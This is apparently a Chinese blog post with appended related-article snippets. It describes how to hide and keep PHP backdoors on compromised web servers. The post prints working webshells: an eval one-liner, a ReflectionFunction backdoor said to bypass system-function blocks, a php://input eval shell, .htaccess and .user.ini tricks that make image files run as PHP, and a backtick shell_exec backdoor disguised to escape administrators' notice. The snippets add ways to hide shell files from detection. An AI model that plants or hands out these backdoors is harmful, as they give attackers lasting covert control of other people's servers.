php隐藏后门,php后门隐藏技巧

最新推荐文章于 2024-07-10 07:05:01 发布
最新推荐文章于 2024-07-10 07:05:01 发布
阅读量332 收藏
点赞数
文章标签: php隐藏后门

一句话 and 大马

phpspy  菜刀一句话<?php @eval($_POST['cmd']);?>

反射后门

$func = new ReflectionFunction($_GET[m]);

echo $func->invokeArgs(array($_GET[c]));

?>

调用如x.php?m=system&c=whoami

后门也可绕过某些检测禁用system函数的防护系统

29129d25629536b0146e8eb08544615c.png

php:input

php://input是用来接收post数据(这里有php://input的介绍)

@eval(file_get_contents('php://input'))

?>

Post提交 system('whoami');

9d00dfd41be933175dc9c31a0b771bac.png

.htaccess(需webserver支持)

可以设置任意后缀也可以设置UTF7编码格式shell

AddType  application/x-httpd-php     .jpg

然后再传一个JPG结尾的shell,访问即可执行了

.user.ini(需fastcgi配合)

动态修改php.ini配置文件

User.ini

auto_prepend_file:指定在每个PHP页面执行前所要执行的代码

auto_prepend_file=demo.gif (每个页面都会加载demo.gif)

5a7553ffc3f67f710b9411a099a1f593.png

59e962620dd529bc269c91acd90a08e6.png

使用php://input (不需要上传额外的文件)(需要自行打开allow_url_include=on 默认为off)

缺点:不支持.user.ini修改allow_url_include (在PHP5时是PHP_INI_SYSTEM。 从PHP5.2.0起可用。)

7eefad4ef1e9c70ff6f82d6a82576ee7.png

http://php.net/manual/zh/ini.list.php

http://php.net/manual/zh/configuration.changes.modes.php

weixin_31092081
关注
一个不易被发现的PHP后门代码解析
12-18
偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。 伪装性很好,很容易被管理员忽略。 $selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; } 刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的), 通过 echo `系统命令`; 可以
PHP后门隐藏
weixin_34273479的博客
08-17 211
首先建立一PHP文件test.php 文件内容为:    $test=$_GET['test'];  @include 'test/'.$test;  ?>     Txt文件一般都是说明文件,所以我们把一句话***放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话***粘贴到t.txt文件里。然后访问[url]http://localhost...
PHP设置后门保护代码的亲身经历
最新发布
Li91314的博客
07-10 164
只有这样,我们才能确保自己的网站在日益复杂的网络环境中安全、稳定地运行。那天,我收到了一封来自服务器的警报邮件,说网站可能存在安全风险。这让我意识到,我的网站可能存在后门,被攻击者利用。通过这些措施的实施,我成功地保护了我的网站免受恶意攻击。只有不断学习、不断实践、不断完善自己的安全措施,才能确保网站的安全和稳定。但在这个过程中,我意识到,仅仅关闭后门是不够的,更重要的是要预防类似的事情再次发生。直到有一次,我负责维护的一个小型网站遭遇了恶意攻击,我才深刻意识到保护代码的重要性。
php后门隐藏与维持技巧,PHP后门隐藏与维持技巧php后门技巧_PHP教程
weixin_28816215的博客
03-18 184
PHP后门隐藏与维持技巧php后门技巧在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普。AD:0×00前言在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门...
php后门隐藏技巧大全
hackzkaq的博客
01-13 132
`搜索公众号:白帽子左一,每天更新技术干货! 辛辛苦苦拿下的 shell,几天没看,管理员给删了。其实隐藏技巧也有很多 1.attrib +s +h 一创建系统隐藏文件: attrib +s +a +r +h attrib +s +h 文件名 在 Windows 10下即使开启了显示隐藏的项目,或dir仍然看不见。 2. 利用 ADS 隐藏文件 NTFS交换数据流(Alternate Data Streams,简称 ADS)是 NTFS 磁盘格式的一个特性,在 NTFS文件系统下,每个文件都可以存在.
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
PHP后门隐藏的一些技巧总结
12-16
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。 1、隐藏文件 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性...
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
php如何开后门,php如何隐藏后门
weixin_35692916的博客
03-18 289
php如何隐藏后门php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名解决覆盖...
PHP后门隐藏技术再探--太强了
weixin_33696822的博客
05-19 97
作者:lis0 来源:lis0's Blog 测试环境:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2 最近在看完了一个程序的代码后又重新温习了PHP中文手册, 在看的过程中突然想到了一个隐藏后门的方法,拿来给大家分享下 嘿嘿:) 在***服务器后如何能将后门做到不被管理员大叔发现这是很重要的。因此就出现了各种隐藏的方法,对于php来...
php隐藏后门,php 后门隐藏技巧
weixin_28741707的博客
03-09 431
辛辛苦苦拿下的 shell,几天没看,管理员给删了。这篇文章是我个人小小的总结,很多方面都建立在自己理解上思考,如果你有更好的思路,各位表哥们也可以分享。隐藏隐藏技巧很多,废话不多说直接开始。一. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名 查看隐藏文件 二. 利用 ADS 隐藏文件NTFS 交换数据流(Alternate Da...
phpspy.php,一款php后门 phpspy的情况 收藏
weixin_29785723的博客
03-13 653
phpspy这款php后门很多人也许因为没有使用过,所以不知道作用,这里详细的说明:把几个主要功能解释一下,首先从原先版本里就有的开始说!!************************************************************1 设置部分.....首先,用记事本打开下载完毕的phpspy.php会看到相关设置,按着注释修改就可以了,admin['check']等于...
实战分析PHP大马隐藏后门——案例二
W小哥
07-06 1724
一、PHP大马准备 PHP大马,示例如图所示 二、分析过程 第一步: 查看 php 大马的源码,惊奇的发现这代码也太少了吧,而且登录大马之后的功能还很多,代码这么少肯定有问题。 更多资源: 1、web安全工具、渗透测试工具 2、存在漏洞的网站源码与代码审计+漏洞复现教程、 3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频 4、应急响应真实案例复现靶场与应急响应教程 收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥 ...
我会肾透——利用驱动隐藏后门
m0_60767986的博客
05-30 212
驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker 下载链接: http://www.xoslab.com/efl.html一般做黑链的小朋友都会这样设置:只勾选可读,其他的一律拒绝……那么,会有这样的效果,该文件不会显示,不能通过列目录列出来,也不能删除,除非你知道完整路径,你才可以读取文件内容。并且该软件还可以设置密码,启动、修改设置、卸载及重复安装的时候都需要密码,更蛋疼的是,主界面、卸载程序等都可以删除,只留下核心的驱动文件就行了。
php里echo怎么读,php怎么隐藏echo输出结果
weixin_42502811的博客
03-16 234
php隐藏echo输出结果的解决办法:首先打开相应的PHP文件;然后检查ajax请求;最后通过“if(!empty($_SERVER['HTTP_X_REQUESTED_WITH'])...”方式隐藏echo输出结果即可。本文操作环境:windows7系统、PHP7.1版,DELL G3电脑具体问题:从php脚本向javascript函数发送数据echo json_encode($rows);当页...
php超强后门在任意位置创建文件,php一句话后门参考(php安全防范技术)
weixin_32558527的博客
03-09 370
php写的程序,由于开发人员水平的问题,经常会存在一些后门被人利用。本节介绍PHP一句话木马。利用404页面隐藏PHP小马:复制代码 代码示例: "-//IETF//DTD HTML 2.0//EN" >404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace( "/[pageerr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值